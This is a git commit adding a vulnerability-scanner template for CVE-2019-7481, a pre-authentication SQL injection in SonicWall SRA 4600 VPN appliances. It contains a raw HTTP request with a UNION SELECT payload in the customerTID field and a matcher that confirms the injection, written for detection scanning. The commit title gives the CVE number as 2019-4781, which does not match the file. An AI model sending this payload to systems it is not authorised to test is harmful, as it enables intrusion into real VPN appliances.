Merge pull request #1734 from darrenmartyn/patch-1

Create CVE-2019-4781.yaml
2021-06-22 13:21:04 +05:30 · 2021-06-22 13:21:04 +05:30 · 1c4a2a56a7
parent b827a019bc 2539c830ac
commit 1c4a2a56a7
1 changed files with 28 additions and 0 deletions
--- a/cves/2019/CVE-2019-7481.yaml
+++ b/cves/2019/CVE-2019-7481.yaml
@ -0,0 +1,28 @@
+id: CVE-2019-7481
+
+info:
+  name: sonicwall sra 4600 vpn pre-authenticated sql injection
+  author: _darrenmartyn
+  severity: high
+  description: |
+    The SonicWall SRA 4600 VPN appliance suffers a pre-authentication SQL injection vulnerability.
+  reference: |
+    - https://www.crowdstrike.com/blog/how-ecrime-groups-leverage-sonicwall-vulnerability-cve-2019-7481/
+  tags: cve,cve2019,sonicwall,sqli
+
+requests:
+  - raw:
+      - |
+        POST /cgi-bin/supportInstaller HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: identity
+        User-Agent: MSIE
+        Content-Type: application/x-www-form-urlencoded
+
+        fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0--
+
+    matchers:
+      - type: word
+        words:
+          - "4220397236"
+        part: body